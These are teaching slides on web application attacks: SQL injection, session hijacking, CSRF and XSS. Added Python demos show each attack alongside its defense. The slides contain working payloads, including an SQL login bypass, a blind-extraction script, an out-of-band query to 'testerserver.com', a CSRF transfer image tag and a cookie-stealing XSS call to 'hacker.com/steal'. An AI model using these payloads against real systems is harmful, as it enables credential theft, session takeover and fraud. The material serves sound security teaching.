13/03/2015

HACKING SCHOOL
Hacking Web Applications
Gabriel Maciá Fernández

Web fundamentals

Diagram: CLIENT (browser, holding the user's private data) <-- HTTP --> SERVER (web server, backed by a database)


Interaction with web servers

URLs
http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba.txt

Scheme (http)
Authority: user:password@server:port (the server name is resolved with a DNS lookup)
Path (/descarga.php)
Arguments (?file=prueba.txt)

Note that credentials embedded in the URL (gmacia:pass) travel in clear text and end up in browser history, proxy and server logs.


WEB APPLICATION ATTACKS

OWASP

Brief history
OWASP Top 10 2013
1. Injection
2. Broken authentication and session management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross-Site Request Forgery (CSRF)
9. Using components with known vulnerabilities
10. Unvalidated Redirects and Forwards


INJECTION ATTACKS

Injection attacks
Basis: untrusted data is sent to an interpreter as part of a command or query, and the interpreter cannot tell where the command ends and the data begins.
Some types:

SQL injection
LDAP injection
Command injection
Hibernate (HQL) injection
XPath injection
Local File Inclusion (LFI)
Remote File Inclusion (RFI)


SQL (Structured Query Language)

Users table (note that this example keeps passwords in clear text; see defenses (III)):

Nombre  | Email         | Password
--------|---------------|----------
Gabriel | gmacia@ugr.es | J3oldgs23
Juan    | juan@ugr.es   | Sdwe3342&
Luis    | luis@ugr.es   | 34s3gsd23

SELECT email FROM Users WHERE nombre='Gabriel';

UPDATE Users SET email='juan@correo.ugr.es' WHERE nombre='Juan'; -- comment (everything after -- is ignored)
INSERT INTO Users VALUES ('Pepe', 'pepe@correo.ugr.es', '34Sgerud');
DROP TABLE Users;


Server-side code

Login code (PHP): the user-supplied name and password are pasted straight into the SQL string

$result = mysql_query("select * from Users where (name='$user' and password='$pass');");

SQL injection

Input for the name field:
Gabriel' OR 1=1); --

Resulting query ($quemasda, "whatever", stands for any password at all):
$result = mysql_query("select * from Users where (name='Gabriel' OR 1=1); --' and password='$quemasda');");

The quote closes the name string, OR 1=1 makes the WHERE clause true for every row, and -- turns the rest of the query, password check included, into a comment.


Shall we try it?

Other attack techniques

Vulnerable query:
SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

Boolean (blind) exploitation: the page only reveals whether the query matched, so the attacker asks one yes/no question per character
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

Error-based exploitation (Oracle): the database is made to put the data into an error message that the application echoes back
INPUT:
id=10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))
OUTPUT:
ORA-29257: host SCOTT unknown


Other attack techniques (continued)

Out-of-band exploitation (Oracle): the data leaves through a network request the database itself makes to a host the attacker controls
INPUT:
id=10||UTL_HTTP.request('testerserver.com:80'||(SELECT user FROM DUAL))
OUTPUT (listener on the attacker's host):
/home/tester/nc -nLp 80
GET /SCOTT HTTP/1.1
Host: testerserver.com
Connection: close

Time-delay exploitation (MySQL): when nothing is echoed back, the answer is read from how long the response takes
id=10 AND IF(version() like '5%', sleep(10), 'false'))
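The boolean technique above, carried through to a complete extraction. This is an added example, not code from the original slides: it builds an in-memory SQLite table shaped like the Users table, a lookup with the slide's WHERE Id='$Id' flaw that only reports whether a row matched, and an attacker routine that recovers a column one character at a time with a binary search per character. The table rows are constructed for the demo; SQLite has no sleep() or UTL_HTTP, so only the boolean variant is shown, and SQLite spells ASCII/SUBSTRING as unicode()/substr().

```python
"""Boolean-based blind SQL injection against an in-memory SQLite database.

Added example, not code from the original slides.  The vulnerable query has
the shape SELECT ... FROM Users WHERE Id='$Id' and the application reveals
only whether a row matched; that single bit is enough to read any column one
character at a time.  Table layout and rows are constructed for the demo.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data, mirroring the slide's Users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Id INTEGER, username TEXT, email TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?)",
        [(1, "Gabriel", "gmacia@ugr.es", "J3oldgs23"),
         (2, "Juan", "juan@ugr.es", "Sdwe3342&"),
         (3, "Luis", "luis@ugr.es", "34s3gsd23")],
    )
    return db


def vulnerable_lookup(db: sqlite3.Connection, user_id: str) -> bool:
    """The application as the attacker sees it: the untrusted $Id is pasted into
    the SQL string and the page only says whether something was found."""
    sql = f"SELECT email FROM Users WHERE Id='{user_id}'"
    return db.execute(sql).fetchone() is not None


class BlindExtractor:
    """Drives the yes/no oracle and counts how many requests the attack costs."""

    def __init__(self, db: sqlite3.Connection):
        self.db = db
        self.queries = 0

    def oracle(self, known_id: str, condition: str) -> bool:
        # Same construction as the slide's
        #   1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
        # close the string, AND in the question, re-balance the quotes.
        self.queries += 1
        payload = f"{known_id}' AND ({condition}) AND '1'='1"
        return vulnerable_lookup(self.db, payload)

    def extract(self, known_id: str, column: str, max_len: int = 32) -> str:
        """Recover a text column of the row whose Id is known_id.

        Each character is found by binary search on its code point, so a
        printable ASCII character costs about 7 queries instead of up to 95."""
        result = ""
        for pos in range(1, max_len + 1):
            if not self.oracle(known_id, f"length({column}) >= {pos}"):
                break  # past the end of the string
            lo, hi = 32, 126  # printable ASCII range
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle(known_id, f"unicode(substr({column},{pos},1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            result += chr(lo)
        return result


if __name__ == "__main__":
    ex = BlindExtractor(make_db())
    name = ex.extract("1", "username")
    pw = ex.extract("1", "password")
    print(f"Id=1: username={name!r} password={pw!r} after {ex.queries} requests")
```

The query counter is the point to watch: about eight requests per character is cheap enough that a whole table is within reach, which is why "the page shows no data" is not a mitigation.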


SQL Injection defenses (I)

Input validation ("sanitize your inputs")
Blacklisting
  Delete the characters you do not want, e.g. ' and ;
  Downside: legitimate input such as John O'Connor is mangled
Escaping
  Replace problematic characters with safe ones
  Change ' to \'
  Use the libraries that do this for you (the database driver's escaping function) rather than hand-written replacements
Whitelisting
  Accept only what a valid value looks like, e.g. an integer within the right range

SQL Injection defenses (II)

Prepared statements
Decouple the code from the data: the query text is parsed first and the values are bound afterwards, so a value can never change the structure of the query.

Vulnerable (string concatenation):
$result = mysql_query("select * from Users where (name='$user' and password='$pass');");

With prepared statements (mysqli):
$db = new mysqli('localhost', 'user', 'pass', 'DB');
$query = $db->prepare('select * from Users where (name=? and password=?)');
$query->bind_param('ss', $user, $pass);
$query->execute();
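The two versions of the login side by side, run against a throwaway database, together with the whitelisting check from defenses (I). This is an added example, not the slides' PHP: mysql_query("... '$user' ...") becomes an f-string and prepare()/bind_param('ss', ...) becomes execute() with ? placeholders, which is the same separation of SQL text and bound values. The table contents are constructed for the demo.

```python
"""The slide's login, once with string concatenation and once with bound
parameters, against an in-memory SQLite database.

Added example, not code from the original slides; table contents constructed.
"""
import re
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (name TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                   [("Gabriel", "gmacia@ugr.es", "J3oldgs23"),
                    ("Juan", "juan@ugr.es", "Sdwe3342&")])
    return db


def injected_query(user: str, password: str) -> str:
    """The SQL text the vulnerable version hands to the database (for display)."""
    return f"select * from Users where (name='{user}' and password='{password}')"


def vulnerable_login(db: sqlite3.Connection, user: str, password: str):
    """mysql_query("select * from Users where (name='$user' and password='$pass');")
    Returns the matched row, or None when the login fails."""
    return db.execute(injected_query(user, password)).fetchone()


def safe_login(db: sqlite3.Connection, user: str, password: str):
    """$db->prepare('select * from Users where (name=? and password=?)') and
    bind_param('ss', $user, $pass): the SQL is fixed before the values are
    seen, so a quote inside $user is just a character in a string."""
    sql = "select * from Users where (name=? and password=?)"
    return db.execute(sql, (user, password)).fetchone()


def parse_user_id(raw: str, lo: int = 1, hi: int = 10**6) -> Optional[int]:
    """Whitelisting from defenses (I): an id must be a decimal integer in range.
    Anything else, including 1' OR '1'='1, is rejected before any SQL runs."""
    if re.fullmatch(r"[0-9]+", raw) is None:
        return None
    value = int(raw)
    return value if lo <= value <= hi else None


if __name__ == "__main__":
    db = make_db()
    payload = "Gabriel' OR 1=1); --"   # the slide's input for the name field
    print(injected_query(payload, "whatever"))
    print("vulnerable:", vulnerable_login(db, payload, "whatever"))  # a row: bypassed
    print("prepared:  ", safe_login(db, payload, "whatever"))        # None: rejected
```

With the payload, the concatenated query still parses because the comment swallows the dangling quote and parenthesis; the bound version searches for a user literally named "Gabriel' OR 1=1); --" and finds nothing.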


SQL Injection defenses (III)

Mitigation strategies
Limit privileges: the database account the application uses should only be able to run the queries the application needs (no DROP TABLE)
Encrypt sensitive data, so that a successful injection still does not yield usable secrets:
  Credit cards table
  User passwords (store a salted hash rather than a reversible encryption, since the application never needs the clear text back)

SESSION HIJACKING ATTACKS


Stateful HTTP
HTTP is stateless
Cookies are used to implement statefulness: the server issues a session identifier in a cookie and the browser sends it back with every request

Session hijacking
Knowing a cookie gives you access with the privileges of the user who established that session
How to steal session cookies

Compromise the server or the user's machine/browser
Predict it based on other information (short or sequential identifiers)
Network-based attacks:
  Sniff the network (over plain HTTP the cookie travels in clear text)
  DNS cache poisoning: trick the user's browser into thinking you are LinkedIn, and it will send you the cookie


Shall we try it?

Defenses
Unpredictability
  Random and long cookies (from a cryptographically secure random source)
Time out sessions and delete tokens (on the server, on logout and after inactivity)
IP address check (doubtful defense)
  May be problematic:
    Change of IP due to DHCP, or when moving from WiFi to 3G
    Same IP for every client behind a NAT box
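The defenses above as code: a predictable identifier of the kind the "predict it" attack targets next to one drawn from the OS random source, a server-side session table that enforces the idle timeout and deletes tokens on logout, and the Set-Cookie attributes that take the cookie off plain HTTP and out of reach of page scripts. This is an added example, not code from the original slides; the cookie name, the lifetime and the weak scheme are assumptions chosen to illustrate the points.

```python
"""Session identifiers and their server-side table.

Added example, not code from the original slides.  Cookie name, lifetime and
the 'weak' identifier scheme are assumptions made for the demonstration.
"""
import secrets
import time
from typing import Callable, Dict, Optional


def weak_session_id(user_id: int, counter: int) -> str:
    """What 'predict it based on other information' targets: an id built from
    values an attacker can observe or count.  One captured cookie reveals the
    pattern; the neighbours follow."""
    return f"{user_id:04d}{counter:06d}"


def predict_next_weak(observed: str) -> str:
    """The attacker's side: the id issued right after the one observed."""
    return f"{int(observed[:4]):04d}{int(observed[4:]) + 1:06d}"


def strong_session_id(nbytes: int = 32) -> str:
    """256 bits from the OS CSPRNG, base64url so it drops straight into a cookie.
    Guessing it is no cheaper than guessing a 256-bit key."""
    return secrets.token_urlsafe(nbytes)


def set_cookie_header(sid: str, name: str = "SESSIONID") -> str:
    """Secure keeps the cookie off plain HTTP (sniffing); HttpOnly keeps it out of
    document.cookie (the theft route used by XSS later in the deck)."""
    return f"Set-Cookie: {name}={sid}; Path=/; Secure; HttpOnly"


class SessionStore:
    """Server-side session table.  The cookie is only an opaque key into it, so
    the server can expire or delete a session regardless of what the browser
    still holds."""

    def __init__(self, idle_timeout: float = 15 * 60,
                 clock: Callable[[], float] = time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock  # injectable so expiry can be exercised without sleeping
        self._sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        sid = strong_session_id()
        self._sessions[sid] = {"user": user, "last_seen": self.clock()}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """User owning the cookie, or None.  Idle sessions are removed on sight,
        so a cookie stolen earlier stops working once the timeout has passed."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if self.clock() - sess["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        sess["last_seen"] = self.clock()
        return sess["user"]

    def destroy(self, sid: str) -> None:
        """Logout: delete the token server side.  Clearing the browser's cookie
        alone would leave a stolen copy valid."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    weak = weak_session_id(7, 41)
    print("weak:  ", weak, "-> next is", predict_next_weak(weak))
    store = SessionStore()
    sid = store.create("gmacia")
    print("strong:", set_cookie_header(sid))
    print("lookup:", store.lookup(sid))
```

The IP check the slide calls doubtful is deliberately absent: the store binds a session to nothing but its random key, and the timeout plus server-side deletion bound how long a stolen cookie stays useful.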


CROSS-SITE REQUEST FORGERY (CSRF) ATTACKS

Fundamentals
Imagine that:
  A user is logged in with an active session cookie
  This request is issued:
  http://banco.com/transfer?cant=6000&a=hacker
  The browser attaches the session cookie automatically, so the bank carries out the transfer as that user.

How could you get a user to visit this link?


CSRF attack
<img src="http://banco.com/transfer?cant=6000&a=hacker">

Diagram: the browser loads a page from hacker.com that contains the image tag; to fetch the "image" it requests the URL from banco.com with the user's cookie attached, and banco.com moves the money ($$$).

Defenses
Using the REFERER field (only accept state-changing requests whose Referer is your own site)
Problems:
  Referer is optional
  Attacker can force the Referer not to be sent:
    Man in the middle
    Browser vulnerability
    Bounce the user off a page such as ftp://page (no Referer is sent when navigating from some schemes)
  So a missing Referer has to be rejected, which locks out legitimate users whose browser or proxy strips it
Using secretized links: a per-session secret that the attacker's page cannot know
http://website.com/algo.html?sid=81sdgs234e
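Both defenses as request checks, with the forged request the <img> tag produces fed through them. This is an added example, not code from the original slides. The secret is derived as an HMAC of the session id under a server key (one common construction; the slide only says "secretized"), the parameter name csrf and the header handling are assumptions, and the request dictionaries are constructed for the demo.

```python
"""The two CSRF defences from the slide as request checks: the Referer test,
with the gap the slide points out, and a secret in the request that the
<img> on hacker.com cannot supply.

Added example, not code from the original slides.  Token construction
(HMAC of the session id under a server key), the 'csrf' parameter name and
the header handling are assumptions chosen for the demo.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

SITE_HOST = "banco.com"
SERVER_KEY = secrets.token_bytes(32)  # would live in configuration; generated here for the demo


def referer_allows(headers: Dict[str, str]) -> bool:
    """Pure Referer check, failing closed on a missing header.  Because the
    header is optional and some navigations never send it, this also rejects
    legitimate users, which is the slide's objection to it."""
    ref = headers.get("Referer")
    if not ref:
        return False
    return urlsplit(ref).hostname == SITE_HOST


def csrf_token(session_id: str) -> str:
    """Secret bound to the session.  The logged-in user receives it inside
    banco.com's pages; hacker.com can make the browser send the cookie but,
    by the same-origin policy, cannot read those pages to learn the token."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_allows(params: Dict[str, str], session_id: str) -> bool:
    presented = params.get("csrf", "")
    expected = csrf_token(session_id)
    # constant-time comparison on bytes (compare_digest rejects non-ASCII str)
    return hmac.compare_digest(presented.encode(), expected.encode())


def transfer_allowed(headers: Dict[str, str], params: Dict[str, str], session_id: str) -> bool:
    """Decision for the transfer endpoint: the token is mandatory; the Referer is
    checked only when present, so privacy tools that strip it do not lock out
    legitimate users, while a visible foreign Referer is still rejected."""
    if not token_allows(params, session_id):
        return False
    ref = headers.get("Referer")
    if ref is not None and urlsplit(ref).hostname != SITE_HOST:
        return False
    return True


def forged_img_request() -> Tuple[Dict[str, str], Dict[str, str]]:
    """What the browser sends when hacker.com's page contains
    <img src="http://banco.com/transfer?cant=6000&a=hacker">: the user's cookie
    rides along automatically, but no attacker-chosen attribute can carry
    banco.com's token.  (Constructed request.)"""
    headers = {"Referer": "http://hacker.com/", "Cookie": "SESSIONID=81sdgs234e"}
    params = {"cant": "6000", "a": "hacker"}
    return headers, params


if __name__ == "__main__":
    sid = "81sdgs234e"  # session id from the slide's example link
    legit = {"cant": "6000", "a": "juan", "csrf": csrf_token(sid)}
    print("legit :", transfer_allowed({"Referer": "http://banco.com/transfer.html"}, legit, sid))
    print("forged:", transfer_allowed(*forged_img_request(), sid))
```

Note that the cookie in the forged request is genuine: the bank cannot distinguish the two requests by who is logged in, only by whether the request carries something the attacker's page could not have produced.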


CROSS-SITE SCRIPTING (XSS) ATTACKS

Same-origin policy
JavaScript enables Web 2.0:
  Modify web pages (DOM)
  Track events
  Issue web requests and maintain connections (AJAX)
  Read and set cookies

Browsers provide isolation for JavaScript via the Same-Origin Policy
  Only scripts received from a web page's origin (scheme, host and port) have access to the page's elements
XSS is the attacker getting a script of their choosing delivered from the victim site's origin, so the policy no longer protects that site.


Stored XSS attack (diagram)
1. hacker.com injects a malicious script into content stored on banco.com; the browser later loads that page from banco.com, script included
4. the browser executes the script as if the server itself had asked it to, issuing requests such as
   GET http://banco.com/roba?c=document.cookie
   GET http://banco.com/transfer?cant=6000&a=hacker

Reflected XSS attack (diagram)
hacker.com hands the browser a URL specially crafted for the attack; the browser requests it and banco.com echoes the script back in its response
5. the browser executes the script as if the server itself had asked it to


Echo of user input
The key: finding situations where a server echoes the user input back in the HTML response
Example:
GET http://victim.com/search.php?term=guitars

Result from victim.com:

<html> <title> Search results </title>
<body>
Results for guitars:

</body></html>

Exploiting echoed input

http://victim.com/search.php?term=<script>window.open("http://hacker.com/steal?c="+document.cookie)</script>

Result from victim.com:

<html> <title> Search results </title>
<body>
Results for <script>window.open("http://hacker.com/steal?c="+document.cookie)</script>:

</body></html>

The browser cannot tell that the script came from the URL rather than from victim.com, so it runs it with victim.com's origin and cookies.


Shall we try it?

Defenses
Sanitizing: remove the executable portions of user-provided input
  Done on many blogs, e.g. WordPress
  https://wordpress.org/plugins/htmlpurified/
Output encoding: escape <, >, &, " and ' when the input is written into HTML, so the browser renders it as text rather than markup
Blacklist vs whitelist: a blacklist of known-bad tags is bypassed by every variant it did not anticipate; a whitelist of allowed markup (or plain escaping of everything) is the safer default
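The search page from the slides rendered three ways: echoed as-is, after a blacklist filter that strips <script> tags, and with output encoding. This is an added example, not code from the original slides; the page template, the filter and the bypass strings are constructed for the demo, and the "is there a live script" check is a regular expression standing in for a browser.

```python
"""Reflected XSS on the slide's search page: blacklist filtering versus output
encoding.

Added example, not code from the original slides.  Template, filter and bypass
inputs are constructed for the demo; contains_script() is a crude stand-in for
a browser's parser.
"""
import html
import re

# The slide's payload.
PAYLOAD = '<script>window.open("http://hacker.com/steal?c="+document.cookie)</script>'


def render_vulnerable(term: str) -> str:
    """search.php as on the slide: the term is echoed straight into the HTML."""
    return ("<html> <title> Search results </title>\n<body>\n"
            f"Results for {term}:\n</body></html>")


def blacklist_filter(term: str) -> str:
    """'Remove the executable portions': strip <script> tags.  Non-overlapping
    matches are removed once, which is how nested tags survive it."""
    return re.sub(r"</?script[^>]*>", "", term, flags=re.IGNORECASE)


def render_blacklisted(term: str) -> str:
    return render_vulnerable(blacklist_filter(term))


def render_encoded(term: str) -> str:
    """Output encoding: every character with meaning in HTML is escaped, so the
    browser shows the term as text and nothing typed can become markup."""
    return render_vulnerable(html.escape(term, quote=True))


def contains_script(page: str) -> bool:
    """Does the page contain a live <script> tag or an event-handler attribute
    inside a tag?  Escaped text (&lt;script&gt;) never matches."""
    return re.search(r"<script\b|<\w+[^>]*\bon\w+\s*=", page, re.IGNORECASE) is not None


if __name__ == "__main__":
    nested = "<scr<script>ipt>alert(1)</scr</script>ipt>"
    for name, term in [("slide payload", PAYLOAD), ("nested tags", nested),
                       ("event handler", '<img src=x onerror=alert(1)>')]:
        print(f"{name:14} echoed={contains_script(render_vulnerable(term))} "
              f"blacklist={contains_script(render_blacklisted(term))} "
              f"encoded={contains_script(render_encoded(term))}")
```

The blacklist stops the exact payload from the slide and nothing else: splitting the tag in two reassembles it after filtering, and an event handler on an image needs no script tag at all. Encoding has no such list to keep up with.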


The challenge

Thanks for your attention

Thanks to:
Michael Hicks for his nice examples about web attacks
